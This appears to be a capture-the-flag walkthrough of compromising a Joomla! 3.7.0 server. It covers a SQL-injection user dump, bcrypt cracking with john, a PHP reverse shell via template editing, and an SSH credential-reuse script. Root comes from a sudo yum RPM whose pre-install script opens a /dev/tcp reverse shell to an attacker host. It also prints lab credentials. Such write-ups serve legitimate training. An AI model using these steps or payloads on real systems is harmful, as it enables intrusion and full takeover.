Time: 6 hours
Hint taken: 0
I accessed the web server. It is a blog-like application showing an article claiming that "Spider-man" robbed the bank.
Looking at the HTML, it shows that Joomla! is being used.
At first look, I tried to find the Joomla! version in the web pages, but they do not seem to expose it.
I googled for more information and found out that the Joomla! version can be read from the language manifest file (Joomla! 3.x ships a world-readable /language/en-GB/en-GB.xml whose version element matches the installed core), even when the pages themselves hide it.
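As an added example (not part of the original writeup), this is the version check scripted in shell: it pulls the version element out of a Joomla! language manifest. The manifest path is the standard Joomla! 3.x location, TARGET is a placeholder, and the sample XML is constructed to look like a real en-GB.xml so the parser can be exercised offline.

```shell
# Added example, not from the writeup: read the Joomla! version from the
# language manifest. /language/en-GB/en-GB.xml is the standard 3.x location.

# Extract the first <version> element from a Joomla! XML manifest read on stdin.
joomla_version_from_manifest() {
    sed -n 's/.*<version>\([^<]*\)<\/version>.*/\1/p' | head -n 1
}

# Fetch the manifest from a live target (placeholder host) and print the
# version, or "unknown" when the file is missing or has no version element.
joomla_version() {
    target="$1"
    v=$(curl -fsS "http://$target/language/en-GB/en-GB.xml" 2>/dev/null | joomla_version_from_manifest)
    if [ -n "$v" ]; then printf '%s\n' "$v"; else printf 'unknown\n'; fi
}

# Constructed sample manifest, shaped like the real en-GB.xml, for offline use.
SAMPLE_MANIFEST='<?xml version="1.0" encoding="utf-8"?>
<metafile version="3.7" client="site">
    <name>English (en-GB)</name>
    <version>3.7.0</version>
    <creationDate>April 2017</creationDate>
</metafile>'

# Usage against the sample:   printf '%s\n' "$SAMPLE_MANIFEST" | joomla_version_from_manifest
# Usage against a target:     joomla_version TARGET
```

The sed pattern matches only a literal `<version>` element, so the `version="3.7"` attribute on the `metafile` tag (which carries the language pack's minimum, not the installed core version) is ignored.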
I tried navigating to all the directories listed in robots.txt. /administrator was promising because it shows an admin panel.
But I need to find the credentials for the Super User first.
Open ports:
- ssh (22)
- http (80)
- mysql (3306)
It seems that the main attack vectors are the web server and the database.
Gaining Foothold (1)
I tried a few SQL injection payloads in the user login form, but they did not work.
So I googled for an exploit for Joomla! 3.7.0 (the unauthenticated SQL injection in com_fields, CVE-2017-8917) and ran the public script, which dumps users and sessions from the database.
Note: the script requires Python 2.
 - Found table: fb9j5_users
 - Found user ['811', 'Super User', 'jonah', 'email@example.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
 - Extracting sessions from fb9j5_session
I will need to crack the password. First, I try to identify the hash algorithm using an online hash identifier (https://hashes.com/en/tools/hash_identifier). The $2y$ prefix marks it as bcrypt (the PHP password_hash format Joomla! uses), and the 10 after it is the cost factor, so cracking will be slow and a good wordlist matters.
I tried to use john to crack the password:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt jonah.txt
So the password is spiderman123
I log in as jonah to the admin panel.
Getting Reverse Shell from Joomla!
This took more time.
After googling, I discovered that we can edit a template's index.php from the admin panel (Extensions > Templates) and
replace its content with a PHP reverse shell; browsing to any page that uses that template then executes it.
Gaining Foothold (2)
I struggled to find the user flag manually, so I decided to run some Linux enumeration scripts.
First I used a python one-liner to spawn a proper TTY:
python -c 'import pty; pty.spawn("/bin/sh")'
I went through my Linux PE checklist and none of the checks worked.
I saw we have an account:
In addition, I tried to check a few things:
- Trying all the SUID binaries to see if I can escalate privileges -> did not work
- Looking for kernel exploits -> did not work
Then, during the linpeas enumeration, I saw that a database password had been discovered.
- Tested whether mysql has any exploit and whether it is running as root -> did not work
- I tried to log in to MySQL as root:
mysql -u root -p -D joomla
- But there was nothing useful there.
- I tried looking for Linux exploits and sudo exploits -> did not work
- No progress. I am going to log in as jjameson over SSH. I tried brute-forcing, but it did not work.
How I realized my mistakes
At this point, I have not made any progress other than finding the database password.
MySQL password: user root, password nv5uz9r3ZEDzVjNu
So I read through the checklists of other hackers.
This helped a lot: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
I realized my mistake. I should check whether the discovered passwords are reused for SSH, and not rely on brute-forcing alone.
SSH – Login Checks Methodology
- Check whether any known password is reused. Do this for every user and every new password discovered during enumeration.
- Only if that fails, try brute-forcing.
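An added example (not the author's script) of that methodology in shell: walk every known user against every discovered password over SSH before touching a wordlist. It assumes sshpass is installed on the attack box; the host is a placeholder, and the user and password lists are constructed from the names and passwords that appear in this writeup.

```shell
# Added example, not from the writeup: credential-reuse check over SSH.
# Requires sshpass; HOST is a placeholder, lists are constructed from this writeup.

# Attempt one SSH login; return 0 on success, non-zero otherwise.
# Password auth is forced, the host key is accepted for this check only,
# and short timeouts keep the loop fast.
try_ssh() {
    host="$1"; user="$2"; pass="$3"
    SSHPASS="$pass" sshpass -e ssh -q \
        -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
        -o ConnectTimeout=5 -o NumberOfPasswordPrompts=1 \
        -o PreferredAuthentications=password -o PubkeyAuthentication=no \
        "$user@$host" true 2>/dev/null
}

# Walk users x passwords (space-separated lists, so this assumes passwords
# without spaces); print the first working pair as "user:password".
# Returns 0 when a reuse is found, 1 otherwise.
check_reuse() {
    host="$1"; users="$2"; passwords="$3"
    for u in $users; do
        for p in $passwords; do
            if try_ssh "$host" "$u" "$p"; then
                printf '%s:%s\n' "$u" "$p"
                return 0
            fi
        done
    done
    return 1
}

# Constructed inputs: accounts seen on the box and passwords recovered so far.
USERS="jjameson jonah"
PASSWORDS="spiderman123 nv5uz9r3ZEDzVjNu"

# Usage:  check_reuse HOST "$USERS" "$PASSWORDS"
```

Re-run it each time enumeration turns up a new password; with files of users and passwords, `hydra -L users.txt -P passwords.txt ssh://HOST` does the same job and handles passwords containing spaces.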
It took me 4 hours to figure out that the database password is reused as
jjameson's SSH password.
Now I can log in as jjameson.
The first thing I do is to run
I saw that this account can run sudo yum.
Good article: https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2
First I need to install fpm and rpm on the attack machine:
git clone https://github.com/jordansissel/fpm
cd fpm
sudo gem install fpm
sudo apt-get install rpm
Then create a root.sh file with the payload:
#!/bin/bash
bash -i >& /dev/tcp/[ATTACKER IP]/3333 0>&1
Then create the package with root.sh:
fpm -n root -s dir -t rpm -a all --before-install root.sh .
Start a nc listener on port 3333.
Transfer the package to the target machine and install it; yum runs the package's pre-install scriptlet as root, which is what executes root.sh:
sudo yum localinstall -y [package name].rpm
In the listener, we receive a connection as the root user.